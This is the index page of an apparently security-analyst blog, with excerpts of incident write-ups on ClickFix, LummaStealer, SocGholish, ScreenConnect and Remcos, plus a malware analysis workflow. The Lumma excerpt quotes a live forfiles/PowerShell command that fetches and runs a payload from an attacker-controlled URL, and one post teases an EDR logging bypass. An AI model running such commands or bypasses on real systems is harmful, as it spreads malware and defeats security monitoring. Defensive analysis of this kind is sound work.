====================
== Alert Overload ==
====================
Tales from a SOC analyst

Getting Started with Malware Analysis and Reverse

Getting Started with Malware Analysis and Reverse Engineering

This page is from internal enterprise documentation that was created for introducing common malware analysis topics. This is not a copmrehensive document, and many sections link to online resources. Tool selection and documentation is largely based on what is present in the enterprise lab the document was created for.

Contents

Malware Analysis Workflow


    +-------------------------------------+
    |        Malware Analysis Workflow    |
    +-------------------------------------+
                       |
                       v
         +-----------------------------+
         |     Threat Intelligence     |
         +-----------------------------+
         | - Hash Lookups (VT, HA)     |
         | - IP/Domain Reputation      |
         |   (AbuseIPDB, ThreatFox)    |
         | - Sample Pivoting (Any.run) |
         | - YARA/IoC Extraction       |
         +-----------------------------+
                       |
                       v
         +----------------------------+
         |      Static Analysis       |
         +----------------------------+
         | - File Analysis            | <-- Tools: PEStudio, DIE, HashMyFiles
         | - Code Analysis            |
         | - Disassembly              | <-- Tools: Ghidra, IDA Free
         +----------------------------+
                       |
                       v
         +----------------------------+
         |      Dynamic Analysis      |
         +----------------------------+
         | - Network Monitoring       | <-- Tools: Wireshark, INetSim
         | - Process Monitoring       | <-- Tools: ProcMon, ProcExp
         | - API Call Monitoring      | <-- Tools: API Monitor
         | - Logging                  | <-- Tools: Sysmon, PowerShell logs
         +----------------------------+
                       |
                       v
    +-------------------------------------+
    |  Debugging & Reverse Engineering    |
    +-------------------------------------+
    | - IDA                               | <-- Tools: IDA Pro, Ghidra
    | - x64dbg                            | <-- Tools: x64dbg, Scylla
    +-------------------------------------+

Threat Intelligence

Threat intelligence gathering is an important step in scoping the work that needs to be done during the analysis. Often, a sample has defining traits that can be serached for in public threat intel spaces like VirusTotal, Tria.ge, or any other sandboxing/intel platform. By searching for these traits, like hashes, filenames, networking indicators, etc., you can determine if a sample needs to be reversed, categorized as a variant, or simply documented as a known sample.

Read more...

Big EDR Hates This One Easy Trick!

Bypass Details

This will be a quick post, but I was playing around with a couple of EDR bypass methods this week after getting some inspiration from a ClickFix incident that abused SSH ProxyCommand. I wanted to write an EDR logging bypass that used SSH to launch arbitrary commands. Improving on the method I saw in the incident. Unfortunately, I didn’t do that. However, I did write up a simple and compact method to bypass command line logging. It’s confirmed working with a major EDR product and likely works for all products (maybe, idk, I just have the one to test on).

Read more...

ClickFix - freewebstatics

ClickFix - freewebstatics

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

ClickFix attacks are a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. Office of Information Security.

Incident Overview

The SOC was alerted to a Potentially Unwanted Program (PUP) execution on a host device. This PUP was named client32.exe, which additionally flagged as a file that may be imitating a system file. Investigation of this alert revealed a base file path of "C:\Users\%USER%\AppData\Roaming\VFrTdT\client32.exe". This file belongs to the NetSupport Remote Monitoring and Management (RMM) tool. It is commonly used by threat actors to gain control of victim devices.

Read more...

ClickFix - Smartlifeshift

ClickFix - Smartlifeshift

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

ClickFix attacks are a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. Office of Information Security.

Incident Overview

ClickFix has been a persistent threat since its emergence in 2024. The SOC has seen and resolved alerts stemming from ClickFix on a weekly basis, with incidents heavily ramping up in 2025. Recently, there has been a troubling trend of added complexity to ClickFix events. This incident in particular utilizes stealth and persistence measures to deploy a Lumma payload after tricking users into executing a PowerShell command that serves as a loader for a separate malware dropper. This incident also demonstrates some obfuscation and session control measures. The loader uses a special User-Agent string to download the payload from the threat actor controlled infrastructure. Any attempt to connect to the server without proper headers fails. Despite these improvements, EDR was able to detect and prevent the initial download from completing.

Read more...

Lumma

LummaStealer

Brief write-up on LummaStealer events observed in managed environments

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

Initial Detection Events

Users download a Windows lnk file from a malicious site that contains an executable command to launch forfiles.exe (a LOLbin for executing commands) with a command line similar to "C:\Windows\System32\forfiles.exe" /p C:\ /m Use*s /c "powershell Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto". This command line works as follows:

Read more...

ScreenConnect

ScreenConnect

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

Initial Detection Events

The alert came from a concierge security service for the download and execution of an actor controlled ScreenConnect RMM Tool. The process was not blocked by EDR. SOC investigation concluded that the user executed a malicious application that may have installed ScreenConnect for malicious access to the device.

Read more...

SocGholish

SocGholish

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

SocGholish is a well-known malware campaign that masquerades as software updates, typically for browsers, to trick users into downloading malicious files. Often, SocGholish uses compromised websites to accomplish this task. WordPress sites are particularly vulnerable if default configurations are not changed. On February 27th, 2024, an EDR alert lead to the discovery of SocGholish malware on a state device. The EDR solution worked as intended and blocked the process from running. Further analysis found that a local Minnesota website was compromised and serving the malware. A search was conducted, and, in total, 12 distinct devices had visited the compromised website in the past 30 days (02/07/2024-03/07/2024). No evidence suggests that any compromise of state devices occurred.

Attack Chain

  1. The user visits a compromised website (ecowaterminnesota.com)
  2. An embedded script covers the screen and executes a linked malicious script.
  3. The malicious script contains the SocGholish payload.
  4. A fake update page is loaded over the screen, prompting the user to download a software update.
  5. The downloaded file is a JavaScript file often named “update”, “version”, or some other software updated related name.
  6. The user executes the “update” file, and the malware connects to a Command and Control (C2) server.
  7. Data is exfiltrated and in some cases, lateral movement or secondary payloads may be executed.

alt text

Read more...

Infector API

Infector API

The infector API (not at all a malicious thing, although it defintely started as a malware delivery system) is a long term project I started on in March. The primary goals were to establish a functional API server written entirely in Rust. Currently, the API server offers several different services, hooks into various technologies including a SQLite database for authentication, and has SSL/TLS support via Let’s Encrypt. In it’s current incarnation, it isn’t entirely ready for deployment. However, I thought this would be a good time to start documenting the journey I’ve taken creating this, and more importantly, what I’ve learned creating it.

Read more...

Phishing Analysis #1

phishing

Phishing Analysis

This article was originally written for internal use. It has been adapted for public release. Some content has been removed. I’ll try and do an actual rewrite at some point.

E-Mail Message

Phishing attacks typically start with either a malicious attachment or malicious domain. For this sample, the phishing event started with a link to a PDF file hosted by Gamma App. Gamma App and other file hosts are often used to serve malicious files. These services often have little to no security measures in place for detecting or preventing malware or phishing.

Read more...

Remcos v5.3.0

Remcos RAT

Reverse Engineering a Remcos RAT 5.3.0 Pro sample

alt text

This sample was taken from MalwareBazaar.

I was in the mood to do some malware reversing and came across an HTA sample on Malware Bazaar that seemed interesting. I had recently finished cleaning up some Lumma Stealer infections at work, and I wanted to dig into something that had a little more going on for it. There’s only so many fake captcha pages you can clean up in one day :).

Read more...
1 of 3 Next Page